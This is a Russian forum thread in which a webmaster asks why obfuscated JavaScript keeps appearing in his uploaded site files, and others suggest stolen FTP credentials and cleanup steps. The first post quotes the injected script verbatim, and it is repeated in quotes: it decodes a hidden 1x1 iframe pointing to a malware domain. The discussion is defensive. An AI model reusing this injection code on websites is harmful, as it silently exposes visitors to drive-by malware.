Надоедливый JS вирус
Здравствуйте у меня такой вопрос.
Я несколько раз через FTP заливал свой сайт на сервер. (Даже на разные серверы)
И каждый раз некоторые файлы сайта были изменены.
Точнее туда добавлялась злонамерный javascript код приведенный ниже:
[HTML]
<script>function sYDozMLRL(qvQEVLNw){ var nuJAVCgu = document.getElementById('ylZGQIDm'); fff.op.replace("1030"); }
document['w152r172i114t116120e'.replace(/[0-9]/g,'')]('<div id=lGeD style="visibility:hidden;display:none">%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%27http%3A%2F%2Freklamma.com%2Fin.cgi%3F9%27%3E%3C%2Fiframe%3E</div>');function BzvYwRZCN(wRRJB){ var LMxDDWU = document.getElementById('jPkA');var EbAmdZRGA=new Function("iofTqcr", "return 8078;"); }
document['w101r182i140t196132e'.replace(/[0-9]/g,'')](unescape(document.getElementById('lGeD').innerHTML));function VuWiCyzaHi(vhMFeMyy){ var ngaoL=new Function("kVnKkkmVkC", "return 186934;"); }
function etvSxMYGf(sZzx){ fff.op.replace("450"); }
function PZhEG(AiP){ fff.op.replace("1093");window.eval(); }
</script>
[/HTML]
Несколько раз я менял пароли доступа на FTP сервер все равно не помогло. В чем может быть причина? :confused:
Это уже второй сервер куда я бросаю свой сайт и сталкиваюсь с такой проблемой. В моих кодах и в моем сайте такой javascript код отсутствует.
:(
Я несколько раз через FTP заливал свой сайт на сервер. (Даже на разные серверы)
И каждый раз некоторые файлы сайта были изменены.
Точнее туда добавлялась злонамерный javascript код приведенный ниже:
[HTML]
<script>function sYDozMLRL(qvQEVLNw){ var nuJAVCgu = document.getElementById('ylZGQIDm'); fff.op.replace("1030"); }
document['w152r172i114t116120e'.replace(/[0-9]/g,'')]('<div id=lGeD style="visibility:hidden;display:none">%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%27http%3A%2F%2Freklamma.com%2Fin.cgi%3F9%27%3E%3C%2Fiframe%3E</div>');function BzvYwRZCN(wRRJB){ var LMxDDWU = document.getElementById('jPkA');var EbAmdZRGA=new Function("iofTqcr", "return 8078;"); }
document['w101r182i140t196132e'.replace(/[0-9]/g,'')](unescape(document.getElementById('lGeD').innerHTML));function VuWiCyzaHi(vhMFeMyy){ var ngaoL=new Function("kVnKkkmVkC", "return 186934;"); }
function etvSxMYGf(sZzx){ fff.op.replace("450"); }
function PZhEG(AiP){ fff.op.replace("1093");window.eval(); }
</script>
[/HTML]
Несколько раз я менял пароли доступа на FTP сервер все равно не помогло. В чем может быть причина? :confused:
Это уже второй сервер куда я бросаю свой сайт и сталкиваюсь с такой проблемой. В моих кодах и в моем сайте такой javascript код отсутствует.
:(
Сайт самописный или на двиге?
Если на движке, то, вполне возможно, боты используют известные дыры.
Если на движке, то, вполне возможно, боты используют известные дыры.
сайт 100% самописный, я сам написал.
На обоих серверах идентичные "дополнения? Тогда предлагаю проверить методом убивания все возможные лишние процессы в в диспетчере задач и службы. Или же переснос системы:D
2alex-kniaz
где диспетчер задач??? где переснос системы??? на сервере??? :eek:
2mikhalych
огласите тогда уж, что за сервера, что за хостер. и откуда вы этот яваскрипт выцепили - открыв код страницы в браузере, или скачав свой же файл по фтп.
если хостинг бесплатный, вполне возможно, хостер рекламу просто вставляет (в яваскрипте не силен, но кажись там с рекламой что-то связано)
где диспетчер задач??? где переснос системы??? на сервере??? :eek:
2mikhalych
огласите тогда уж, что за сервера, что за хостер. и откуда вы этот яваскрипт выцепили - открыв код страницы в браузере, или скачав свой же файл по фтп.
если хостинг бесплатный, вполне возможно, хостер рекламу просто вставляет (в яваскрипте не силен, но кажись там с рекламой что-то связано)
ну сколько можно мусолить эту тему.....
пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.
и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))
UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)
пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.
и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))
UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)
Цитата: ~ArchimeD~
2alex-kniaz
У себя конечно. Раз на 2-х разных серверах одна проблема
фаервол поставь и проскань систему, и будет тебе счастье. 100% сидит вирус.
Сегодня наш сайт сам словил такую фигню - я так понял, имеено этот JS сод добавляется в конец всех файлов на хостинге =(
Что именно этот код делает - хз) но с ним сайт написаный на PHP(двиг VamShop) и с элементами JS на страницах просто отказался работать...
и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))
UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)
Что именно этот код делает - хз) но с ним сайт написаный на PHP(двиг VamShop) и с элементами JS на страницах просто отказался работать...
Цитата: Тень Пса
ну сколько можно мусолить эту тему.....
пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.
пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.
Моя венда-семерка была установлена вчера и ничего залить по фтп я просто не успел - сайт работал без подобных проблем около 2-х лет.
Цитата: Тень Пса
и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))
А вот это уже интересно - сайт просто не хочет открываться без Особого плагина Java(не скрипт). Выяснять что именно делает этот скрипт времени просто нет - нужно него убить поскорее и подумать как защититься.
Во время "нападения" у хостера упал Мускуль, ну это по крайней мере они нам так сказали. А до падения Мускуля была страння фигня тоже - сайт - интернет-магазин, в списке онлайн пользователей висел незарегистрированный юзер, который пихал себе в корзину все, что ни попадя, сумма корзины доросла до 6 миллионов рублей! Вот это я как раз и думаю был бот. Концы ip уходят куда-то в Москву, но станут ли бота пускать без проксей :D
Цитата: Тень Пса
UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)
Я тоже офигел, когда при заходе Chromoм на обслуживаемый мною сайт, он мне заявил, что там вредоносное ПО...
Временное решение как быстро вычистить эту заразу - помогает связка прог FindFiles и Notepad++ - это под венду все... под линь не знаю альтернатив.
0. Меняем все пароли доступа к фтп
1. Дампим сайт себе на комп
2. Берем кусочек этого кода - я взял "function sYDozMLRL(qvQEVLNw)"
3. Ищем с помощью FindFiles этот кусок во всех файлах сайта
4. Открываем все найденные файлы одновременно в Notepad++
5. Заменяем во всех открытых файлах вышеприведенный код на пробел
6. Заливаем эти файлы обратно на фтп
7. Меняем все пароли доступа снова
8. Пытаемся изучить хттп и фтп логи доступа к сайту...
0. Меняем все пароли доступа к фтп
1. Дампим сайт себе на комп
2. Берем кусочек этого кода - я взял "function sYDozMLRL(qvQEVLNw)"
3. Ищем с помощью FindFiles этот кусок во всех файлах сайта
4. Открываем все найденные файлы одновременно в Notepad++
5. Заменяем во всех открытых файлах вышеприведенный код на пробел
6. Заливаем эти файлы обратно на фтп
7. Меняем все пароли доступа снова
8. Пытаемся изучить хттп и фтп логи доступа к сайту...